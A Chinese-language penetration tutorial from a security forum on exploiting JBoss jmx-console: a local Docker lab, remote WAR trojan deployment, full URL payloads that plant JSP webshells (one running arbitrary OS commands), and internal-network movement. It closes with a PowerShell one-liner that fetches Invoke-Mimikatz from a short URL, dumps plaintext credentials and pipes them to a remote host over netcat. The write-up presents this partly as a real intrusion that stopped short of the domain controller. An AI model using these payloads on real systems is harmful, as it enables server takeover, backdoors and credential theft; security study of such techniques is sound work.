• 投稿邮箱:admin@xssec.org 查看详情
  • 本站教程默认解压密码:666
  • 官方新浪微博:Porry呦
  •    1个月前 (12-13)  渗透教程 评论关闭

    0x00 环境部署

    先在本地搭建一个jboss环境

    jmx-console 先安装docker镜像,docker pull tutum/jboss:as5

    然后:

    docker run -d -p 8080:8080 -p 9990:9990 -e JBOSS_PASS="mypass" tutum/jboss
    

    管理器的地址是 http://127.0.0.1:9990/manager/html 或者不设置密码

    docker run -d -p 8080:8080 -p 9990:9990 tutum/jboss 
    

    选择as4版本,是老版本的jboss

    记一次漫游内网附带对jboss安全性检测

    找到addurl,填上war木马地址,进行远程部署

    记一次漫游内网附带对jboss安全性检测

    点击change

    记一次漫游内网附带对jboss安全性检测

    然后菜刀链接

    记一次漫游内网附带对jboss安全性检测

    0x01 漏洞复现 web-console

    参考 wooyun-2015-0157256

    http://localhost:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True 
    

    带回显:

    http://192.168.31.6:8080/upload5warn/shell.jsp?f=hello.jsp&t=%3C%25if(%22023%22.equals(request.getParameter(%22pwd%22)))%7Bjava.io.InputStream%20in%20=%20Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream();int%20a%20=%20-1;byte%5B%5D%20b%20=%20new%20byte%5B2048%5D;out.print(%22%3Cpre%3E%22);while((a=in.read(b))!=-1)%7Bout.println(new%20String(b));%7Dout.print(%22%3C/pre%3E%22);%7D%25%3E%0A
    

    上面的用法任意写 http://192.168.31.6:8080/upload5warn/shell.jsp?f=hello.txt&t=whoami

    记一次漫游内网附带对jboss安全性检测

    之后在 http://192.168.31.6:8080/admin-console/secure/summary.seam?path=-33&conversationId=43&conversationPropagation=end会找到项目

    记一次漫游内网附带对jboss安全性检测

    物理路径为 /jboss-5.1.0.GA/server/default/deploy/management/upload5warn.war/shell.jsp

    查看路径发现

    记一次漫游内网附带对jboss安全性检测

    所以访问 http://192.168.31.6:8080/upload5warn/shell.jsp?f=hello.txt&t=whoami可以写任意内容

    记一次漫游内网附带对jboss安全性检测

    0x02 内网渗透

    这里选择的是msf来入侵内网,用这个搞内网还是很成熟的,自动化很爽。

    记一次漫游内网附带对jboss安全性检测

    可以看到源码

    记一次漫游内网附带对jboss安全性检测

    尝试msf,但是发现反弹不出来,测试ping不通任何外网主机

    记一次漫游内网附带对jboss安全性检测

    试了几个常见的exp最终提权成功,不过域控没有搞下来,本次渗透就此作罢。 powweshell抓明文

    powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" | nc 192.168.1.1 4444
    
     

    除特别注明外,本站所有文章均为新世纪安全社区原创,转载请注明出处来自http://www.xssec.org/1417.html

    关于
    
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    扫一扫二维码分享